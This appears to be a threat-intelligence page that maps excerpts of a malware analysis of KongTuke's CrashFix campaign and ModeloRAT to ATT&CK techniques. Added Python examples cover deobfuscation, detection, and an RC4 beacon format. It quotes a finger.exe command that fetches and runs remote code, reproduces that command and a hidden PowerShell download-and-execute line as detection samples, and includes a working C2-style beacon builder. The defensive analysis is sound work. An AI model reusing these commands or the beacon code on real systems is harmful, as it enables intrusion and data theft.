"…c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe & %temp%\ct.exe [email protected][.]108 | cmd". Upon execution, the finger command retrieves a large charcode blob containing obfuscated PowerShell using ROT cipher encoding. Once de…"
T1547.001 Registry Run Keys / Startup Folder (99%)
"…, defaulting to 150 milliseconds. After six or more consecutive communication failures, the RAT backs off to an extended interval of 900 seconds (15 minutes) to avoid detection. When recovering from a single communication failure, it uses a reconnection interval of 150 seconds…"
T1568.002 Domain Generation Algorithms (97%)
"…dbg, dnSpy, Immunity Debugger, HyperDbg, Cheat Engine, and IDA. If any match, the process gets closed, and the check returns true. Figure 28: excityimpatchscableterrine function. Once the DGA spits out domains, the loader constructs its callback URL: - hxxp://[dga_domai…"
T1027 Obfuscated Files or Information (97%)
"…different encrypted blobs, both using the same salt and password for AES, then XOR'd together to produce the final plaintext. Layer 2: XOR (because why not?). After AES decryption spits out a Base64 string, it goes through a second round, this time a simple XOR cipher: the x…"
T1059.001 PowerShell (95%)
"…host "test payload!!!!". Either the threat actor has a sense of humor, or the campaign is in the testing phase. Conclusion: KongTuke's CrashFix campaign demonstrates how threat actors continue to evolve their social engineering tactics. By impersonating a trusted open-source…"
T1027 Obfuscated Files or Information (95%)
"…256 in CBC mode with PBKDF2 key derivation: the password and salt are stored as static byte arrays within <Module>.<>c. Inside that <>c struct, there are dozens of byte arrays with names like: - set_avataricon getgroups getassembliesfromdirectory.parseuint64(cipherte…"
T1027 Obfuscated Files or Information (95%)
"…obfuscation through verbosity, where all class names, methods, and variables use unnecessarily long, pseudo-technical names such as instruction_result_repository instead of simply results. This significantly increases cognitive load during manual analysis. Obfuscation and a…"
T1176 Software Extensions (92%)
"…beacon URL: - hxxps://nexsnield[.]com/update?uuid=550e8400-e29b-41d4-a716-446655440000&version=2025.1116.1842&previous=2025.1115.1000. Figure 10: update beacon transmitting UUID, current version, and previous version to C2 server. The extension set…"
T1071.001 Web Protocols (92%)
"It also performs privilege detection to determine if running as SYSTEM, administrator, or standard user, and can execute arbitrary PowerShell commands with a 30-second timeout and 10MB output limit. Persistence is achieved by writing to the HKCU\Software\Microsoft\Windows…"
T1176.001 Browser Extensions (89%)
"…yourself from malvertising, malicious advertisements that deliver malware through legitimate ad networks. Our victim likely just wanted to get rid of annoying ads. Instead, they downloaded a malicious one (NexShield) while searching for an ad blocker for Chrome. Figure 3: mali…"
T1204.004 Malicious Copy and Paste (88%)
"…user is presented with a fake “security issues detected” alert and instructed to manually “fix” the issue by opening the Windows Run dialog (Win+R), pasting from their clipboard (Ctrl+V), and pressing Enter. The malicious extension silently copies a PowerShell command…"
T1176.001 Browser Extensions (87%)
"…beacon URL: - hxxps://nexsnield[.]com/update?uuid=550e8400-e29b-41d4-a716-446655440000&version=2025.1116.1842&previous=2025.1115.1000. Figure 10: update beacon transmitting UUID, current version, and previous version to C2 server. The extension set…"
T1568.002 Domain Generation Algorithms (82%)
"…) Stage 5 delivers even more PowerShell and even more obfuscation. At this point, you might be wondering if KongTuke gets paid by the layer. Fortunately, automation saves us from manually calculating hundreds of nested expressions like (-8953 + (2890 + 6179)) just to reveal…"
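The "hundreds of nested expressions" in the excerpt above are integer arithmetic that resolves to character codes, and folding them is exactly the kind of automation the write-up alludes to. The following is an added example, not code from the Huntress post or from the KongTuke loader: a small evaluator that resolves every `[char](...)` cast it finds (without ever calling `eval` on attacker-controlled text) and then merges the resulting adjacent string literals. The sample script is constructed for the example; only `[char]` casts, `+ - *` and parentheses are handled, which is the subset the quoted expression uses.

```python
"""Fold nested integer arithmetic back into the characters it hides.

Added example, not code from the Huntress write-up or the KongTuke loader:
stage 5 builds strings from expressions such as [char](-8953 + (2890 + 6179)),
and this evaluator resolves every [char](...) cast it finds, then merges the
resulting adjacent string literals. SAMPLE_SCRIPT is constructed for the
example; [char] casts, + - * and parentheses are the only syntax handled.
"""
import re

CHAR_CAST = re.compile(r"\[char\]\s*\(", re.IGNORECASE)
ADJACENT_LITERALS = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def evaluate(expr):
    """Evaluate + - * and parentheses over integers with a small recursive-descent
    parser instead of eval(), so attacker-controlled text is never executed."""
    tokens = re.findall(r"\d+|[-+*()]", expr)
    pos = 0

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def take():
        nonlocal pos
        if pos >= len(tokens):
            raise ValueError("unexpected end of expression in %r" % expr)
        tok = tokens[pos]
        pos += 1
        return tok

    def parse_sum():            # product (('+'|'-') product)*
        value = parse_product()
        while peek() in ("+", "-"):
            if take() == "+":
                value += parse_product()
            else:
                value -= parse_product()
        return value

    def parse_product():        # factor ('*' factor)*
        value = parse_factor()
        while peek() == "*":
            take()
            value *= parse_factor()
        return value

    def parse_factor():         # ('-'|'+') factor | '(' sum ')' | integer
        tok = take()
        if tok == "-":
            return -parse_factor()
        if tok == "+":
            return parse_factor()
        if tok == "(":
            value = parse_sum()
            if take() != ")":
                raise ValueError("unbalanced parentheses in %r" % expr)
            return value
        return int(tok)

    result = parse_sum()
    if pos != len(tokens):
        raise ValueError("trailing tokens in %r" % expr)
    return result


def ps_literal(ch):
    """Emit a PowerShell single-quoted literal; a quote is escaped by doubling it."""
    return "'" + ch.replace("'", "''") + "'"


def fold_char_casts(script):
    """Replace each [char](expr) with the literal character expr evaluates to."""
    out, i = [], 0
    while True:
        m = CHAR_CAST.search(script, i)
        if not m:
            out.append(script[i:])
            return "".join(out)
        out.append(script[i:m.start()])
        depth, j = 1, m.end()           # walk to the parenthesis closing the cast
        while j < len(script) and depth:
            depth += {"(": 1, ")": -1}.get(script[j], 0)
            j += 1
        if depth:
            raise ValueError("unterminated [char]( at offset %d" % m.start())
        out.append(ps_literal(chr(evaluate(script[m.end():j - 1]))))
        i = j


def merge_literals(script):
    """Collapse 'a' + 'b' + 'c' chains into one literal until nothing changes."""
    while True:
        merged = ADJACENT_LITERALS.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if merged == script:
            return merged
        script = merged


def deobfuscate(script):
    return merge_literals(fold_char_casts(script))


# Constructed sample in the style of the stage: "test" spelled out as arithmetic.
SAMPLE_SCRIPT = ("$s = [char](-8953 + (2890 + 6179)) + [char](3*(40-6)-1)"
                 " + [char]((100+15)) + [char](116); Invoke-Expression $s")

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_SCRIPT))
```

Running it on the constructed sample yields `$s = 'test'; Invoke-Expression $s`. The parser is deliberately narrow: anything outside integer `+ - *` and parentheses raises rather than silently producing a wrong character, which is the behaviour you want when a script's next stage depends on the recovered string.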
T1059.001 PowerShell (82%)
"…t also includes junk code functions at the end of the file designed to confuse static analysis tools and analysts. ModeloRAT is organized into four primary classes: - unnecessarilyprolongedcryptographicmechanismimplementationclass is a straightforward RC4 stream cipher impleme…"
T1071.001 Web Protocols (78%)
"…block` with `nexshield`. Figure 5: NexShield header reference. Comparing the “2025.1116.1841” release of uBlock Origin Lite to the version of NexShield that was live on the Chrome Web Store on January 14, which they called “2025.1116.1842”, shows that the two are nea…"
T1176 Software Extensions (76%)
"…name uses NexShield (with an “h”). UUID generation is a common practice for legitimate extensions to track basic analytics. However, in this case, the UUID is sent to attacker-controlled infrastructure (nexsnield[.]com) and is used to correlate install, update, and uni…"
T1176 Software Extensions (74%)
"…yourself from malvertising, malicious advertisements that deliver malware through legitimate ad networks. Our victim likely just wanted to get rid of annoying ads. Instead, they downloaded a malicious one (NexShield) while searching for an ad blocker for Chrome. Figure 3: mali…"
T1059.006 Python (73%)
"…, and sensitive data, get the VIP treatment: ModeloRAT, a fully-featured Python RAT with RC4-encrypted C2 communications, and support for dropping executables, DLLs, and Python scripts. The RAT even tries to blend in by naming its persistence entries after legitimate softwar…"
T1059.003 Windows Command Shell (62%)
"…Shift+I/J/C), disables right-click context menus, and prevents text selection and dragging. Figure 17: anti-analysis techniques blocking DevTools shortcuts, right-click, and text selection. KongTuke’s new toy: KongTuke started using “finger” in December of 2025. F…"
T1204.002 Malicious File (57%)
"…user is presented with a fake “security issues detected” alert and instructed to manually “fix” the issue by opening the Windows Run dialog (Win+R), pasting from their clipboard (Ctrl+V), and pressing Enter. The malicious extension silently copies a PowerShell command…"
T1059.001 PowerShell (54%)
"…user is presented with a fake “security issues detected” alert and instructed to manually “fix” the issue by opening the Windows Run dialog (Win+R), pasting from their clipboard (Ctrl+V), and pressing Enter. The malicious extension silently copies a PowerShell command…"
T1071.001 Web Protocols (51%)
"….]208 and 158.247.252[.]178. The beacon URL follows the pattern http://{c2_ip}:80/beacon/{client_id}. The communication flow begins when the client collects system metadata and serializes it to JSON. The data is then RC4-encrypted with a random key, and…"
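The excerpt above describes the shape of ModeloRAT's beacon: metadata serialized to JSON, RC4-encrypted, and posted to `http://{c2_ip}:80/beacon/{client_id}`. The following is an added example, not ModeloRAT's code: both sides of such an exchange, with a textbook RC4 so the cipher can be checked against published test vectors. The beacon path and the JSON-then-RC4 ordering follow the write-up; the metadata field names, the client id, the documentation-range C2 address and the way the per-beacon key reaches the server are assumptions (the excerpt is cut off where it explains the key), so here both sides are simply given the same key.

```python
"""Client and server sides of an RC4-wrapped JSON beacon.

Added example, not ModeloRAT's code. The beacon path and the JSON-then-RC4
ordering follow the write-up; the metadata fields, the client id and how the
per-beacon key reaches the server are assumptions, so both sides are simply
given the same key. SAMPLE_* values are constructed, with an RFC 5737
documentation address standing in for the C2.
"""
import json
import os


def rc4(key, data):
    """Textbook RC4 (KSA then PRGA). The same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):                           # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                              # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def beacon_url(c2_ip, client_id):
    """The beacon path pattern quoted in the write-up."""
    return "http://%s:80/beacon/%s" % (c2_ip, client_id)


def build_beacon(metadata, key):
    """Client: serialize the collected host metadata to JSON, then RC4 it."""
    return rc4(key, json.dumps(metadata, sort_keys=True).encode("utf-8"))


def parse_beacon(body, key):
    """Server or analyst: undo both steps. With a wrong key the output is not
    valid UTF-8 JSON, so this raises ValueError instead of returning garbage."""
    return json.loads(rc4(key, body).decode("utf-8"))


def new_session_key(nbytes=16):
    """The write-up says the key is random per beacon; this is one way to do that."""
    return os.urandom(nbytes)


# Constructed sample values (not captured traffic).
SAMPLE_C2 = "203.0.113.10"
SAMPLE_CLIENT_ID = "3f9c1e7a"
SAMPLE_METADATA = {"hostname": "WS-FINANCE-07", "user": "jdoe",
                   "domain": "CORP", "privilege": "standard"}

if __name__ == "__main__":
    key = new_session_key()
    body = build_beacon(SAMPLE_METADATA, key)
    print("POST", beacon_url(SAMPLE_C2, SAMPLE_CLIENT_ID), body.hex())
    print("server decoded:", parse_beacon(body, key))
```

Because RC4 is symmetric and keyed only by the bytes you hand it, an analyst who recovers the key from the sample (or from however the implant transmits it) can decode captured beacon bodies with the same `rc4()` call; a wrong key surfaces as a `ValueError` from the UTF-8 or JSON decode rather than as plausible-looking output.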
T1059.001 PowerShell (48%)
"It also performs privilege detection to determine if running as SYSTEM, administrator, or standard user, and can execute arbitrary PowerShell commands with a 30-second timeout and 10MB output limit. Persistence is achieved by writing to the HKCU\Software\Microsoft\Windows…"
T1497.001 System Checks (42%)
"…triggers adds a specific value. Anti-analysis checks: - username/hostname in a blacklist (things like “malware”, “sandbox”, the infamous “John Doe”)? Add 54 billion. - Debugger window detected? Add 56 billion. - Running in VirtualBox? Add 52 billion. - VMware? Add 32…"
T1176.001 Browser Extensions (42%)
"Dissecting CrashFix: KongTuke's New Toy. Summary: In January 2026, Huntress Senior Security Operations Analyst Tanner Filip observed threat actors using a malicious browser extension to display a fake security warning, claiming the browser had "stopped abnormally" and promptin…"
T1497 Virtualization/Sandbox Evasion (42%)
"…triggers adds a specific value. Anti-analysis checks: - username/hostname in a blacklist (things like “malware”, “sandbox”, the infamous “John Doe”)? Add 54 billion. - Debugger window detected? Add 56 billion. - Running in VirtualBox? Add 52 billion. - VMware? Add 32…"
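The anti-analysis score quoted in the two T1497 excerpts above is additive, one fixed weight per check, and the C2 filters on it; that means an analyst who captures a score can read back which checks fired, provided the weights are chosen so that no two subsets collide. The following is an added example, not the loader's or the C2's code, that does that read-back as a subset-sum search and verifies the collision-freedom property. The first three weights are the ones the excerpt quotes; the VMware weight is cut off at "32" there, so 32 billion is an assumption, as are the check names. Any other components the real score may carry are outside this example: `score` here is the anti-analysis portion only.

```python
"""Read an anti-analysis fingerprint score back into the checks that produced it.

Added example, not the loader's or the C2's code. Each triggered check adds a
fixed value to a score the server filters on. The first three weights are the
ones quoted in the write-up; the VMware weight is truncated there at "32", so
32 billion is an assumption, as are the check names.
"""
from itertools import combinations

BILLION = 1_000_000_000
CHECK_WEIGHTS = {
    "blacklisted_user_or_host": 54 * BILLION,   # "malware", "sandbox", "John Doe", ...
    "debugger_window": 56 * BILLION,
    "virtualbox": 52 * BILLION,
    "vmware": 32 * BILLION,                     # assumed; the source is truncated here
}


def compute_score(fired, weights=CHECK_WEIGHTS):
    """What the stager does: add the weight of every check that fired."""
    return sum(weights[name] for name in fired)


def all_subsets(names):
    """Every combination of check names, the empty set included."""
    for r in range(len(names) + 1):
        for combo in combinations(names, r):
            yield frozenset(combo)


def decompose_score(score, weights=CHECK_WEIGHTS):
    """Every set of checks whose weights sum to `score` (subset-sum over the table)."""
    return [s for s in all_subsets(sorted(weights)) if compute_score(s, weights) == score]


def weights_are_decodable(weights):
    """True if no two different check sets give the same total, i.e. a score can
    always be read back unambiguously. Holds for the table above."""
    seen = {}
    for subset in all_subsets(sorted(weights)):
        total = compute_score(subset, weights)
        if total in seen and seen[total] != subset:
            return False
        seen[total] = subset
    return True


def explain(score, weights=CHECK_WEIGHTS):
    """One triage line for a captured score."""
    hits = decompose_score(score, weights)
    if not hits:
        return "%d: not explainable by the known checks (unknown component?)" % score
    return "%d: %s" % (score, " | ".join(", ".join(sorted(h)) or "clean" for h in hits))


if __name__ == "__main__":
    print("decodable:", weights_are_decodable(CHECK_WEIGHTS))
    for s in (0, 52 * BILLION, 110 * BILLION, 7):
        print(explain(s))
```

With four weights the search is 16 subsets, so brute force is fine; the point of `weights_are_decodable()` is that it tells you up front whether a captured score can be trusted to name its checks, and `explain()` flags a score that no combination reproduces, which is the hint that the real score carries a component not in the table.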
T1027 Obfuscated Files or Information (40%)
"…payload. Opening the DLL payload in dnSpy, you might see something like this: Figure 27: nested string decryption calls resolving sandbox DLL names for detection. The <Module>.<>c stuff? That's where all the encrypted data lives. The KongTuke author is storing their byte a…"
T1583.001 Domains (37%)
"…yourself from malvertising, malicious advertisements that deliver malware through legitimate ad networks. Our victim likely just wanted to get rid of annoying ads. Instead, they downloaded a malicious one (NexShield) while searching for an ad blocker for Chrome. Figure 3: mali…"
T1553.001 Gatekeeper Bypass (33%)
"…server smart enough to filter out researchers based on a numeric fingerprint score. If your system doesn't look like a legitimate victim, you get nothing. For defenders, this campaign reinforces several key points: monitor for unusual use of LOLBins like finger.exe, watch for…"
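The defender guidance in the excerpt above ("monitor for unusual use of LOLBins like finger.exe") and the Win+R paste described in the T1204.004 excerpt both come down to command lines, whether they arrive as process-creation telemetry or as Explorer RunMRU values. The following is an added example, not Huntress detection content: a handful of pattern rules run over sample command lines, with a severity that treats finger.exe on its own as enough. The sample lines are constructed; the first mirrors the structure of the finger command quoted at the top of this page with the remote host replaced by an RFC 5737 documentation address, the second is a generic download-to-IEX one-liner using a reserved domain, and the rest are benign. The rule names, thresholds and the "\1" RunMRU suffix handling are this example's own choices.

```python
"""Flag ClickFix-style command lines: the Win+R paste and the finger.exe retrieval.

Added example, not Huntress detection content. Pattern rules are applied to
process command lines (Sysmon Event ID 1 / EDR telemetry) or to the values of
Explorer's RunMRU key under HKCU, where a Win+R paste is recorded with a
trailing backslash-1 suffix. SAMPLE_LINES are constructed.
"""
import re

RULES = {
    # finger.exe is a LOLBin with no business being copied or reaching the internet
    "finger_lolbin": re.compile(r"\bfinger\.exe\b|\bfinger\s+\S+@\S+", re.I),
    "system_binary_copied_to_temp": re.compile(
        r"\bcopy\b.*\\system32\\\S+\.exe\s+%temp%", re.I),
    "output_piped_to_cmd": re.compile(r"\|\s*cmd(\.exe)?\b", re.I),
    "run_dialog_start_min": re.compile(r'\bstart\s+""\s+/min\b', re.I),
    "powershell_hidden_or_encoded": re.compile(
        r"powershell(\.exe)?.*\s-(w(indowstyle)?\s+hidden|e(nc|ncodedcommand)?\s)", re.I),
    "download_to_iex": re.compile(
        r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest)\b", re.I),
}


def classify(command_line):
    """Names of every rule the command line trips, in table order."""
    line = command_line.rstrip()
    if line.endswith("\\1"):            # RunMRU stores values with a trailing "\1"
        line = line[:-2]
    return [name for name, rx in RULES.items() if rx.search(line)]


def severity(hits):
    """finger.exe alone is enough; otherwise two corroborating rules make it high."""
    if "finger_lolbin" in hits or len(hits) >= 2:
        return "high"
    return "medium" if hits else "none"


def triage(command_lines):
    """(line, severity, hits) for every line that tripped at least one rule."""
    results = []
    for line in command_lines:
        hits = classify(line)
        if hits:
            results.append((line, severity(hits), hits))
    return results


# Constructed samples: one finger-style stager, one hidden PowerShell downloader, two benign lines.
SAMPLE_LINES = [
    r'''cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe & %temp%\ct.exe x@203.0.113.108 | cmd"''',
    r'''powershell.exe -w hidden -c "iex (irm http://example.invalid/a)"''',
    r'''"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer''',
    r'''cmd /c copy report.docx %temp%\report.docx''',
]

if __name__ == "__main__":
    for line, sev, hits in triage(SAMPLE_LINES):
        print(sev.upper(), hits)
        print("   ", line)
```

The rules are deliberately narrow: `copy` on its own is noise, `copy` of a `\system32\*.exe` into `%temp%` is not, and the `start "" /min` prefix is what a pasted Run-dialog command looks like when the actor wants the window to vanish. Feeding RunMRU values through `classify()` is the cheap way to answer "did a user actually paste this" after the extension's fake alert.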
T1055.001 Dynamic-link Library Injection (32%)
"…d111 for workgroup machines, bcda222 for domain-joined - installed antivirus products (queried from SecurityCenter2). The response is piped directly to IEX (Invoke-Expression), executing whatever the C2 returns. Figure 20: anti-analysis process check and victim profil…"
T1218.011 Rundll32 (32%)
"…Shift+I/J/C), disables right-click context menus, and prevents text selection and dragging. Figure 17: anti-analysis techniques blocking DevTools shortcuts, right-click, and text selection. KongTuke’s new toy: KongTuke started using “finger” in December of 2025. F…"
T1059.001 PowerShell (31%)
"…overwrites it with 0xC3, a single ret instruction, causing the function to return immediately without scanning. After fingerprinting, the script generates a pseudo-random .top domain using a seed based on the current day of year. The key parameter contains the accumulated finge…"
Summary
Fake ad blocker crashes your browser, then offers a "fix." Go inside KongTuke's CrashFix campaign, from malicious extension to ModeloRAT for VIP targets.